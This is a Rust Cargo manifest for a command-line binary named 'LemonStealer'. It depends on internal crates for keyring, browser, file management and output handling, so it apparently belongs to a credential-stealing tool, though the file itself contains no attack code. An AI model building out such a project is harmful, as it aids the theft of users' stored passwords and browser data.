[package]
name = "cli"
version.workspace = true
edition.workspace = true
license.workspace = true

[[bin]]
name = "LemonStealer"
path = "src/main.rs"

[dependencies]
clap = { workspace = true }
anyhow = { workspace = true }
hbd_core = { path = "../core" }
keyring = { path = "../keyring" }
browser = { path = "../browser" }
output = { path = "../output" }
filemanager = { path = "../filemanager" }
log = { workspace = true }